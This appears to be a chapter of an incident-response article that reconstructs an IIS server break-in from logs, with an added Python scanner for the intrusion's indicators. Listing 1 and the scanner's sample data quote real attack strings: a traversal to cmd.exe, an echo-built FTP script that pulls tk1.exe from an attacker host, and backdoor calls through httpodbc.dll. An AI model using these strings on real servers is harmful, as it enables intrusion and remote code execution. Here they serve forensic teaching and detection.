Let the Games Begin: Day 2, Afternoon
I couldn't get to the site until the following afternoon. However, this gave me time to plan a tentative approach. After thinking through my options, I decided that the best way to determine what the hacker was up to would be to install a sniffer and see if I could capture any telnet or FTP passwords the hacker used when he logged in. I also planned to take a close look at the log files and file system to see whether any changes in the last 24 hours could account for the latest dilemma. While this seemed like a shot in the dark at best, it ironically provided an answer to a question I wasn't yet even asking.
When I got to the site, I immediately set up shop. The site uses hub-based networking, so instead of switched networking, I was able to simply plug my laptop into the network and start sniffing the traffic.
Hubs broadcast data to all ports and let the device at the end of the wire determine whether a packet was sent to them. Switches, on the other hand, monitor the hardware address of each device plugged into it and pass information to that port only if it is meant to go there. This makes sniffing on a switched network a bit more challenging. (See my article "The Ingredients to ARP Poison.")
My goal was to collect data and analyze it later using Ethereal. To facilitate this, I started up tcpdump on my laptop (running Linux) and directed it to save the capture to a file on my hard drive. With this done, I started looking around on the server at the file system, network connections, and services that were running.
I started with Netstat, which lists the server's current network connections. As you can see in Figure 2, several suspicious connections were very obvious (note the connections to the IRC servers). Next, I took a look at the task list, which shows the programs currently running on the computer. Here, I noticed an unusual service called FireDaemon. After a quick search online, I found out that FireDaemon is a "utility that allows you to install and run virtually any native Win32 application or script (e.g. BAT/CMD, Perl, Java, Python) as a Windows NT/2K/XP service." In other words, FireDaemon is a hacker's dream come true. By installing a root kit as a service, a hacker can basically guarantee that the root kit will execute again whenever the server is rebooted.
Figure 2 Netstat results on hacked server.
Finally, I started to look around the server to see if I could discover how the hacker got in. I started with the Web server logs and found the entries in Listing 1.
Listing 1: Web Server Log Entries
209.115.xxx.xxx, -, 10/31/02, 16:01:11, W3SVC, EXCHANGE, 64.3.xxx.xxx, 859, 156, 331, 200, 0, GET, /scripts/..%5c..%5cwinnt/system32/cmd.exe, /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\script.exe
209.115.xxx.xxx, -, 10/31/02, 16:02:44, W3SVC, EXCHANGE, 64.3.xxx.xxx, 83250, 270, 148, 200, 0, GET, /scripts/script.exe, /c+echo+open+209.184.xxx.xxx>tmp2&&echo+anonymous>>email@example.com>>tmp2&&echo+get+httpodbc.dll>>tmp2&&echo+get+tk1.exe>>tmp2&&echo+bye>>tmp2&&echo+ftp+-s:tmp2>>tmp2.cmd&&echo+exit>>tmp2.cmd&&tmp2.cmd
209.115.xxx.xxx, -, 10/31/02, 16:06:11, W3SVC, EXCHANGE, 64.3.xxx.xxx, 703, 170, 572, 200, 0, GET, /scripts/httpodbc.dll, MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem32%5Ccmd.exe+%2Fc+c%3A%5Cinetpub%5Cscripts%5Ctk1.exe
209.115.xxx.xxx, -, 10/31/02, 16:06:26, W3SVC, EXCHANGE, 64.3.xxx.xxx, 828, 174, 576, 200, 0, GET, /scripts/httpodbc.dll, MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem32%5Ccmd.exe+%2Fc+del+c%3A%5Cinetpub%5Cscripts%5Ctk1.exe
Using these entries as a guide, I went to the folder they named and found three files: tmp2, tmp2.cmd, and httpodbc.dll. I opened the first two in Notepad and discovered that tmp2 was an FTP command file and tmp2.cmd a batch file; together they downloaded tk1.exe and httpodbc.dll, a file commonly used by Nimda. Because the FTP command file pointed to a server using an anonymous account, I logged into the FTP server, which was still up, and grabbed a copy of the file for my own future investigation.
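The log entries in Listing 1 tell the whole story once decoded: the doubly encoded "..%5c" traversal to cmd.exe, the copy of cmd.exe into the scripts folder, the echo-built FTP script, and the httpodbc.dll backdoor call. The following is an added example, not part of the original article, of a small parser that pulls these four indicators out of IIS-format log lines. It runs over constructed sample entries modelled on Listing 1 (addresses are placeholders, and the FTP script line is shortened); the field order and indicator names are assumptions of this example.

```python
from urllib.parse import unquote

# Constructed sample lines in the comma-separated IIS log format of Listing 1.
# Field order assumed: client IP, user, date, time, service, server, server IP,
# time taken, bytes received, bytes sent, status, win32 status, method,
# URI stem, URI query. The last line is a benign request for contrast.
SAMPLE_LOG = """\
209.115.xxx.xxx, -, 10/31/02, 16:01:11, W3SVC, EXCHANGE, 64.3.xxx.xxx, 859, 156, 331, 200, 0, GET, /scripts/..%5c..%5cwinnt/system32/cmd.exe, /c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe
209.115.xxx.xxx, -, 10/31/02, 16:02:44, W3SVC, EXCHANGE, 64.3.xxx.xxx, 83250, 270, 148, 200, 0, GET, /scripts/script.exe, /c+echo+open+209.184.xxx.xxx>tmp2&&echo+anonymous>>tmp2&&echo+get+tk1.exe>>tmp2&&echo+bye>>tmp2&&echo+ftp+-s:tmp2>>tmp2.cmd&&tmp2.cmd
209.115.xxx.xxx, -, 10/31/02, 16:06:11, W3SVC, EXCHANGE, 64.3.xxx.xxx, 703, 170, 572, 200, 0, GET, /scripts/httpodbc.dll, MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem32%5Ccmd.exe+%2Fc+c%3A%5Cinetpub%5Cscripts%5Ctk1.exe
10.0.0.5, -, 10/31/02, 16:07:00, W3SVC, EXCHANGE, 64.3.xxx.xxx, 12, 100, 2000, 200, 0, GET, /default.htm, -
"""

FIELDS = ["c_ip", "user", "date", "time", "service", "server", "s_ip",
          "time_taken", "bytes_recv", "bytes_sent", "status", "win32_status",
          "method", "uri_stem", "uri_query"]


def parse_line(line):
    """Split one IIS-format line into a dict, or return None if it is malformed."""
    parts = [p.strip() for p in line.split(", ", len(FIELDS) - 1)]
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def indicators(entry):
    """Return the indicator names that fire for one parsed entry, in fixed order."""
    # Decode twice: the traversal in Listing 1 works because IIS decoded %5c
    # (a backslash) after its path check, so a single decode can miss it.
    stem = unquote(unquote(entry["uri_stem"])).lower()
    query = unquote(unquote(entry["uri_query"])).replace("+", " ").lower()
    found = []
    if "../" in stem or "..\\" in stem:
        found.append("traversal")
    if "cmd.exe" in stem or "cmd.exe" in query:
        found.append("cmd.exe")
    if "echo " in query and ">>" in query and "ftp" in query:
        found.append("ftp-script-build")
    if "mfcisapicommand=exploit" in query:
        found.append("httpodbc-backdoor")
    return found


def scan(log_text):
    """Return (client IP, time, indicators) for every entry that fires at least one."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is not None:
            inds = indicators(entry)
            if inds:
                hits.append((entry["c_ip"], entry["time"], inds))
    return hits
```

Run against the sample, scan() flags the three attacker lines and skips the benign one, which is the same sequence the article reconstructs by hand.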
I continued my exploration of the server and confirmed that this hack job was definitely the reason the Web server was offline and the reason two new ports were open on the server. This conclusion rested on two facts: the tk1.exe download occurred seconds before the Web server log file went blank, and the FTP server now running on port 65130 announced itself as a "TK DISTRO."
At this point, I was ready to head home. Based on the Netstat results and the newly found information regarding the mysterious TK, I was guessing that this particular hack job was an FTP/back door/IRC Trojan all wrapped up in one nice file (tk1.exe). However, this theory had yet to be validated.